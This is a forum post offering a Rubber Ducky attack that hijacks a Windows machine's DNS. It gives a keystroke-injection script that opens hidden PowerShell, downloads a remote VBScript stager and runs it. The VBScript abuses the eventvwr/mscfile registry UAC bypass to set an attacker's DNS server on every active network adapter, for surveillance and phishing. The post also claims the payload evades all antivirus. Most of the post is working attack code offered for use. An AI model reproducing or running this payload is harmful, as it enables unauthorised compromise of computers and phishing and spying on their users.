Jump to content

Staged DNS attack using Rubber Ducky


Skiddie
 Share

Recommended Posts

This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago

I strongly suggest you check that out first.

https://www.youtube.com/watch?v=fmRRX7-G4lc

https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky

 

So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format)

The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. 

So for the ducky script we are going to be using the following code

DELAY 1000
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME]
ENTER

You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs)

You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin

(Example: http://www.pastebin.com/raw/NEyDVtER  ) <- /raw/ is IMPORTANT)  

 


Here is the .vbs payload. 

 

Dim objWMIService, objShell, colItems, objItem
Set objShell = CreateObject("Wscript.Shell")
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2")

'For each active network adapter
For Each objItem in colItems

'Write UAC bypass regkey with the cmd command as value
	CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ"
'Trigger UAC bypass
	CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
	
'Reset regkey 
	GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
	
Next

 

Here you wanna replace "X.X.X.X" with your malicious DNS server. 


If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/


This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . 


Also, from what i can tell this bypasses all av's... 


Best Regards


~Skiddie

 

 

Edited by Skiddie
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...